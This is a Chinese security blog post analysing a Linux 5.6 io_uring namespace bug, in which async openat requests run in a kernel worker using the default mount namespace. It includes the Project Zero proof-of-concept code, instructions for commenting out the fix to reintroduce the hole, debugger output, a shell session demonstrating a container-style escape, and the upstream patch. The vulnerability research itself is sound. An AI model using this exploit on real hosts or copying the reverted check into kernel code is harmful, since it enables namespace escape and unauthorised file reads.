Linux “io_uring” namespace 的一个问题

Linux

 

看了jannh的report, 有点迷迷糊糊的,于是跟着分析了一波。之前也分析过 io_uring 一个权限问题,io_uring代码还在频繁的更新,期间肯定会出现各种各样的安全问题,要找个时间研究一波hh.

 

环境配置

以下所有的分析都是在 ubuntu 18.04 虚拟机下,使用的是linux-5.6 版本的内核,可以在github上找到我的环境

 

漏洞分析

这个洞其实就是没有做好namespace的检查,最后导致可以读取其他namespace的文件,这放到容器里那就是逃逸了。这里从代码的层面看看究竟发生了什么。

poc

可以在这里 找到jannh 的poc,

int main(void) {
// initialize uring
struct io_uring_params params = { };
int uring_fd = SYSCHK(syscall(SYS_io_uring_setup, /*entries=*/10, &params));
unsigned char *sq_ring = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_SQ_RING));
unsigned char *cq_ring = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_CQ_RING));
struct io_uring_sqe *sqes = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_SQES));
// execute openat via uring
sqes[0] = (struct io_uring_sqe) {
.opcode = IORING_OP_OPENAT,
.flags = IOSQE_ASYNC,
.fd = open("/", O_RDONLY),
.addr = (unsigned long)"/",
.open_flags = O_PATH | O_DIRECTORY
};
((int*)(sq_ring + params.sq_off.array))[0] = 0;
(*(int*)(sq_ring + params.sq_off.tail))++;
int submitted = SYSCHK(syscall(SYS_io_uring_enter, uring_fd, /*to_submit=*/1, /*min_complete=*/1, /*flags=*/IORING_ENTER_GETEVENTS, /*sig=*/NULL, /*sigsz=*/0));

主要看传入的 sqes 部分, 传入的 opcode 是 IORING_OP_OPENAT, 标志 IOSQE_ASYNC 表示用异步的方式执行,打开的是"/" 目录

因为这里使用的内核已经打上了补丁,为了测试漏洞,我们需要手动patch一下,找到fs/io_uring.c 文件, 按照下面把对 fs 的检查注释掉。

/*
 * Capture references to the submitting task's context into req->work so
 * the async io-wq worker thread can later act on the task's behalf.
 *
 * NOTE(article): the fs_struct capture below is deliberately commented out
 * to revert the upstream fix and reproduce the vulnerability — without it
 * the worker keeps the kernel thread's default fs (root/cwd in the init
 * mount namespace), so async path lookups escape the submitter's namespace.
 */
static inline void io_req_work_grab_env(struct io_kiocb *req,
const struct io_op_def *def)
{
/* pin the submitter's address space if this opcode needs it */
if (!req->work.mm && def->needs_mm) {
mmgrab(current->mm);
req->work.mm = current->mm;
}
/* take a reference on the submitter's credentials */
if (!req->work.creds)
req->work.creds = get_current_cred();
/* patched-out fs_struct capture (the actual fix being reverted): */
/*if (!req->work.fs && def->needs_fs) {*/
/*spin_lock(&current->fs->lock);*/
/*if (!current->fs->in_exec) {*/
/*req->work.fs = current->fs;*/
/*req->work.fs->users++;*/
/*} else {*/
/*req->work.flags |= IO_WQ_WORK_CANCEL;*/
/*}*/
/*spin_unlock(&current->fs->lock);*/
/*}*/
/* record the submitter's pid as seen from its own pid namespace */
if (!req->work.task_pid)
req->work.task_pid = task_pid_vnr(current);
}
/*
 * Release the context references taken by io_req_work_grab_env() once the
 * async work item is done with them.
 *
 * NOTE(article): the fs_struct release is commented out to match the
 * reverted capture above — with the fix removed there is never an fs
 * reference to drop.
 */
static inline void io_req_work_drop_env(struct io_kiocb *req)
{
/* drop the pinned mm reference */
if (req->work.mm) {
mmdrop(req->work.mm);
req->work.mm = NULL;
}
/* drop the credential reference */
if (req->work.creds) {
put_cred(req->work.creds);
req->work.creds = NULL;
}
/* patched-out fs_struct release (pairs with the reverted capture): */
/*if (req->work.fs) {*/
/*struct fs_struct *fs = req->work.fs;*/
/*spin_lock(&req->work.fs->lock);*/
/*if (--fs->users)*/
/*fs = NULL;*/
/*spin_unlock(&req->work.fs->lock);*/
/*if (fs)*/
/*free_fs_struct(fs);*/
/*}*/
}

代码分析

SYS_io_uring_enter 之后的调用链如下

__do_sys_io_uring_enter
- io_submit_sqes
- io_submit_sqe
- io_queue_sqe
- io_req_defer_prep //<--
- io_req_work_grab_env

io_req_defer_prep 函数对传入的各种opcode做switch, 我们传入的是IORING_OP_OPENAT, 对应调用io_openat_prep

      break;                                       
case IORING_OP_LINK_TIMEOUT:                     
ret = io_timeout_prep(req, sqe, true);       
break;                                       
case IORING_OP_ACCEPT:                           
ret = io_accept_prep(req, sqe);              
break;                                       
case IORING_OP_FALLOCATE:                        
ret = io_fallocate_prep(req, sqe);           
break;                                       
case IORING_OP_OPENAT:    // <-------------------------------                       
ret = io_openat_prep(req, sqe);              
break;                                       
case IORING_OP_CLOSE:                            
ret = io_close_prep(req, sqe);               
break;                                       
case IORING_OP_FILES_UPDATE:                     
ret = io_files_update_prep(req, sqe);

io_openat_prep 主要是把sqes 的东西拿出来保存好, io_req_defer_prep 执行完之后会调用io_queue_async_work(req)

/*
 * Copy the openat parameters out of the user-supplied SQE into the request
 * so they remain valid when the open is later executed asynchronously by
 * an io-wq worker thread.
 */
static int io_openat_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe)
{
const char __user *fname;
int ret;
/* reject SQE fields that openat does not use */
if (sqe->ioprio || sqe->buf_index)
return -EINVAL;
/* fixed-file mode is not supported for openat */
if (sqe->flags & IOSQE_FIXED_FILE)
return -EBADF;
/* already prepared earlier; nothing more to do */
if (req->flags & REQ_F_NEED_CLEANUP)
return 0;
req->open.dfd = READ_ONCE(sqe->fd);
req->open.how.mode = READ_ONCE(sqe->len);
fname = u64_to_user_ptr(READ_ONCE(sqe->addr));
req->open.how.flags = READ_ONCE(sqe->open_flags);
/* copy the pathname in from userspace now, while current is the submitter */
req->open.filename = getname(fname);
if (IS_ERR(req->open.filename)) {
ret = PTR_ERR(req->open.filename);
req->open.filename = NULL;
return ret;
}
req->open.nofile = rlimit(RLIMIT_NOFILE);
/* mark that the stashed filename must be cleaned up later */
req->flags |= REQ_F_NEED_CLEANUP;
return 0;
}

io_queue_async_work 把req->work 加入到 work queue, 之后会启动一个内核线程来执行这个work

/*
 * Hand the request's work item to the io-wq workqueue, where a kernel
 * worker thread (io_wqe_worker-N) will execute it asynchronously.
 */
static inline void io_queue_async_work(struct io_kiocb *req)
{
struct io_ring_ctx *ctx = req->ctx;
struct io_kiocb *link;
bool do_hashed;
/* decide plain vs. hashed queueing; may also extract a linked request */
do_hashed = io_prep_async_work(req, &link);
trace_io_uring_queue_async_work(ctx, do_hashed, req, &req->work,
req->flags);
if (!do_hashed) {
io_wq_enqueue(ctx->io_wq, &req->work);
} else {
/* hashed on the file's inode so work on the same file is serialized */
io_wq_enqueue_hashed(ctx->io_wq, &req->work,
file_inode(req->file));
}
/* a linked timeout request piggybacks on this one; arm it now */
if (link)
io_queue_linked_timeout(link);
}

实际调试看看,在fs/io_uring.c:912 处下个断点

gef➤  info args
req = 0xffff88800d042c00
sqe = 0xffff88800d0c8000
gef➤  p *req
$1 = {
{
file = 0xffff88800eec4800,
//....
open = {
file = 0xffff88800eec4800,
dfd = 0x0,
{
mask = 0x0
},
filename = 0x0 <fixed_percpu_data>,
buffer = 0x0 <fixed_percpu_data>,
how = {
flags = 0x0,
mode = 0x0,
resolve = 0x0
},
nofile = 0x0
},
//..
work = {
{
list = {
next = 0x0 <fixed_percpu_data>
},
data = 0x0 <fixed_percpu_data>
},
func = 0xffffffff81354760 <io_wq_submit_work>,// <===
files = 0xffff88800ed90580,
mm = 0x0 <fixed_percpu_data>,
creds = 0x0 <fixed_percpu_data>,
fs = 0x0 <fixed_percpu_data>,
flags = 0x0,
task_pid = 0x0
}
}

在work字段里对应的是io_wq_submit_work 函数,进入到这个函数,已经是内核线程了,我们可以下个断点看看

gef➤  bt
#0  io_wq_submit_work (workptr=0xffffc90000277e88) at fs/io_uring.c:4522
#1  0xffffffff81356bba in io_worker_handle_work (worker=0xffff88800e08df00) at fs/io-wq.c:511
#2  0xffffffff81357679 in io_wqe_worker (data=0xffff88800e08df00) at fs/io-wq.c:552
#3  0xffffffff810c0fe1 in kthread (_create=0xffff88800d066b00) at kernel/kthread.c:255
#4  0xffffffff81c00215 in ret_from_fork () at arch/x86/entry/entry_64.S:352
#5  0x0000000000000000 in ?? ()
gef➤  kcurrent
smp system (__per_cpu_offset) 0xffffffff8245c920
cpu_num 0x1
swapper_pgd 0x0
cpu #0 : 0xffff88800f200000
current_task: 0xffff88800eee1600  :io_wqe_worker-0
uid: 0x0   gid: 0x0  :cred 0xffff88800eec2540
mm: 0x0
pgd: 0x0

最后会进入io_issue_sqe函数,然后根据传进来的opcode做switch, 在内核线程里调用io_openat

    case IORING_OP_OPENAT:                           
if (sqe) {                                   
ret = io_openat_prep(req, sqe);          
if (ret)                                 
break;                               
}                                            
ret = io_openat(req, nxt, force_nonblock);

接着调用do_filp_open 来打开文件返回文件描述符。貌似没有什么问题呀,正常的调用openat, 正常的打开文件或文件夹。

这是应用场景的不同,这里出现漏洞的原因是它没有对不同的namespace做区分,namespace是linux对系统资源的一种隔离机制,我们熟悉的docker就有用到namespace的东西,namespace相关的东西可以参考这篇文章,写的真棒,这里不做过多的描述。

利用测试

完整的利用流程如下

/home/pwn # echo aaaa > /tmp/real
/home/pwn # echo $$
206
/home/pwn # ls -al /proc/$$/ns |grep mnt
lrwxrwxrwx    1 root     0                0 Apr 15 02:55 mnt -> mnt:[4026531840]
/home/pwn # pstree -p |grep sh
init(1)---rcS(171)---sh(206)-+-grep(212)
/home/pwn # unshare -m --uts /bin/sh
/bin/sh: can't access tty; job control turned off
/home/pwn # echo $$
213
/home/pwn # pstree -p |grep sh
init(1)---rcS(171)---sh(206)---sh(213)-+-grep(215)
/home/pwn # ls -al /proc/$$/ns |grep mnt
lrwxrwxrwx    1 root     0                0 Apr 15 02:56 mnt -> mnt:[4026532131]
/home/pwn # mount -t tmpfs none /tmp
/home/pwn # ls /tmp
/home/pwn # /exp
submitted 1, getevents done
cq_tail = 1
result: 5
launching shell
sh: can't access tty; job control turned off
/home/pwn # echo $$
223
/home/pwn # pstree -p |grep sh
init(1)---rcS(171)---sh(206)---sh(213)---exp(220)---sh(223)-+-grep(225)
/home/pwn # ls -al /proc/$$/ns |grep mnt
lrwxrwxrwx    1 root     0                0 Apr 15 02:57 mnt -> mnt:[4026532131]
/home/pwn # ls -al /proc/$$/fd/
total 0
dr-x------    2 root     0                0 Apr 15 02:58 .
dr-xr-xr-x    9 root     0                0 Apr 15 02:57 ..
lrwx------    1 root     0               64 Apr 15 02:58 0 -> /dev/console
lrwx------    1 root     0               64 Apr 15 02:58 1 -> /dev/console
lrwx------    1 root     0               64 Apr 15 02:58 2 -> /dev/console
lr-x------    1 root     0               64 Apr 15 02:58 4 -> /
l---------    1 root     0               64 Apr 15 02:58 5 -> /
/home/pwn # cat /proc/$$/fd/5/tmp/real
aaaa
/home/pwn # C#

首先创建一个 /tmp/real 文件,写入aaaa, 看一下当前shell的 mount namespace, 记住它的id为4026531840,

/home/pwn # echo aaaa > /tmp/real
/home/pwn # echo $$
206
/home/pwn # ls -al /proc/$$/ns |grep mnt
lrwxrwxrwx    1 root     0                0 Apr 15 02:55 mnt -> mnt:[4026531840]
/home/pwn # pstree -p |grep sh
init(1)---rcS(171)---sh(206)-+-grep(212)

接着用 unshare 创建一个新的 mount namespace, 然后mount 上 tmpfs, 可以看到namespace的 id是4026532131,和原来的不同, 这个时候就看不到原来namespace的目录下的东西了(想一下docker的隔离),

/home/pwn # unshare -m --uts /bin/sh
/bin/sh: can't access tty; job control turned off
/home/pwn # echo $$
213
/home/pwn # pstree -p |grep sh
init(1)---rcS(171)---sh(206)---sh(213)-+-grep(215)
/home/pwn # ls -al /proc/$$/ns |grep mnt
lrwxrwxrwx    1 root     0                0 Apr 15 02:56 mnt -> mnt:[4026532131]
/home/pwn # mount -t tmpfs none /tmp
/home/pwn # ls /tmp

接着运行 exp, 它会打开/ 目录,返回的fd是 5

/home/pwn # /exp
submitted 1, getevents done
cq_tail = 1
result: 5
launching shell
sh: can't access tty; job control turned off
/home/pwn # echo $$
223
/home/pwn # ls -al /proc/$$/fd/
total 0
dr-x------    2 root     0                0 Apr 15 02:58 .
dr-xr-xr-x    9 root     0                0 Apr 15 02:57 ..
lrwx------    1 root     0               64 Apr 15 02:58 0 -> /dev/console
lrwx------    1 root     0               64 Apr 15 02:58 1 -> /dev/console
lrwx------    1 root     0               64 Apr 15 02:58 2 -> /dev/console
lr-x------    1 root     0               64 Apr 15 02:58 4 -> /
l---------    1 root     0               64 Apr 15 02:58 5 -> /
/home/pwn # cat /proc/$$/fd/5/tmp/real
aaaa

进去看一下可以发现这里打开的是原来namespace的"/" 目录。

linux 默认情况下所有的进程都会有一个系统默认的namespace, 也就是说本身linux就是一个最初的容器,我们新的namespace只是在最初的容器下创建一个新容器罢了。

从前面的分析我们知道,由于是异步的调用,最后会在内核线程io_wqe_worker-0 里调用 do_filp_open 来打开目录, 而所有的内核线程都继承自 kthreadd 线程,使用的是默认的mount namespace

gef➤  kcurrent                                           
smp system (__per_cpu_offset) 0xffffffff8245c920         
cpu_num 0x1                                              
swapper_pgd 0x0                                          
cpu #0 : 0xffff88800f200000                              
current_task: 0xffff88800d080000  :io_wqe_worker-0   
uid: 0x0   gid: 0x0  :cred 0xffff88800eec2840    
mm: 0x0                                          
pgd: 0x0                                         
gef➤  kproc                                                     
0x1  :init            :  uid: 0  task: 0xffff88800ed88000
0x2  :kthreadd        :  uid: 0  task: 0xffff88800ed89600
0x3  :rcu_gp          :  uid: 0  task: 0xffff88800ed8ac00
//...
0xcf :sh              :  uid: 0  task: 0xffff88800d085800
0xd2 :exp             :  uid: 0  task: 0xffff88800d084200//
0xd3 :io_wq_manager   :  uid: 0  task: 0xffff88800d081600
0xd4 :io_wqe_worker-0 :  uid: 0  task: 0xffff88800d080000//

我们看一下他们的namespace

gef➤  p *((struct task_struct *)0xffff88800d084200)->nsproxy // exp  进程
$1 = {
count = {
counter = 0x2
},
uts_ns = 0xffffffff82613620 <init_uts_ns>,
ipc_ns = 0xffffffff8273c7c0 <init_ipc_ns>,
mnt_ns = 0xffff88800d6ece80,
pid_ns_for_children = 0xffffffff8265f7e0 <init_pid_ns>,
net_ns = 0xffffffff827f5ec0 <init_net>,
time_ns = 0xffffffff826bc940 <init_time_ns>,
time_ns_for_children = 0xffffffff826bc940 <init_time_ns>,
cgroup_ns = 0xffffffff826c1780 <init_cgroup_ns>
}
gef➤  p *((struct task_struct *)0xffff88800ed89600)->nsproxy//kthreadd
$3 = {
count = {
counter = 0x35
},
uts_ns = 0xffffffff82613620 <init_uts_ns>,
ipc_ns = 0xffffffff8273c7c0 <init_ipc_ns>,
mnt_ns = 0xffff88800ec65680,
pid_ns_for_children = 0xffffffff8265f7e0 <init_pid_ns>,
net_ns = 0xffffffff827f5ec0 <init_net>,
time_ns = 0xffffffff826bc940 <init_time_ns>,
time_ns_for_children = 0xffffffff826bc940 <init_time_ns>,
cgroup_ns = 0xffffffff826c1780 <init_cgroup_ns>
}
gef➤  p *((struct task_struct *)0xffff88800d080000)->nsproxy//io_wqe_worker-0
$2 = {
count = {
counter = 0x35
},
uts_ns = 0xffffffff82613620 <init_uts_ns>,
ipc_ns = 0xffffffff8273c7c0 <init_ipc_ns>,
mnt_ns = 0xffff88800ec65680,
pid_ns_for_children = 0xffffffff8265f7e0 <init_pid_ns>,
net_ns = 0xffffffff827f5ec0 <init_net>,
time_ns = 0xffffffff826bc940 <init_time_ns>,
time_ns_for_children = 0xffffffff826bc940 <init_time_ns>,
cgroup_ns = 0xffffffff826c1780 <init_cgroup_ns>
}
gef➤

可以看到,io_wqe_worker-0 的mnt_ns 地址是0xffff88800ec65680 ,和默认值一样,因为exp是运行在新的namespace下,它的mnt_ns=0xffff88800d6ece80,整理一下

  • 1 exp 运行(mnt_ns=0xffff88800d6ece80)
  • 2 io_uring 启动内核线程 openat, 内核线程io_wqe_worker-0 使用默认的mnt_ns

于是io_wqe_worker-0 看到的是一开始的mount namespace, 打开的也是原来namespace的"/" 目录,于是我们就可以通过这个fd来任意读里面的内容啦。

补丁

给出的补丁 如下, 添加了fs 字段,然后 启动内核线程前把 exp 的 fs 保存到 req->work.fs 里面

@@ -907,6 +915,16 @@ static inline void io_req_work_grab_env(struct io_kiocb *req,
}
if (!req->work.creds)
req->work.creds = get_current_cred();
+    if (!req->work.fs && def->needs_fs) {
+        spin_lock(&current->fs->lock);
+        if (!current->fs->in_exec) {
+            req->work.fs = current->fs;
+            req->work.fs->users++;
+        } else {
+            req->work.flags |= IO_WQ_WORK_CANCEL;
+        }
+        spin_unlock(&current->fs->lock);
+    }
}
static inline void io_req_work_drop_env(struct io_kiocb *req)
@@ -919,6 +937,16 @@ static inline void io_req_work_drop_env(struct io_kiocb *req)
put_cred(req->work.creds);
req->work.creds = NULL;
}
+    if (req->work.fs) {
+        struct fs_struct *fs = req->work.fs;
+
+        spin_lock(&req->work.fs->lock);
+        if (--fs->users)
+            fs = NULL;
+        spin_unlock(&req->work.fs->lock);
+        if (fs)
+            free_fs_struct(fs);
+    }
}

然后再在内核线程里面检查一致性。

if (work->fs && current->fs != work->fs)     
current->fs = work->fs;

 

小结

总的来说这里和之前cve-2019-19241,差不多,都是因为在内核线程里面没有做好检查,然后可以做一些不可描述的事情,漏洞本身其实也不能说是漏洞,就是忘了检查…通过这个issue学习了一波namespace和cgroup的东西,满足:P.

 

reference

https://bugs.chromium.org/p/project-zero/issues/detail?id=2011

https://lore.kernel.org/io-uring/20200207155039.12819-1-axboe@kernel.dk/T/

https://lore.kernel.org/io-uring/20200207155039.12819-1-axboe@kernel.dk/T/

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=ff002b30181d30cdfbca316dadd099c3ca0d739c

https://segmentfault.com/a/1190000009732550

本文由安全客原创发布 转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/203112

本文来源于Lonely Blog -全球网络安全资讯平台, 转载请注明出处: https://blog.wuhao13.xin/140.html

标签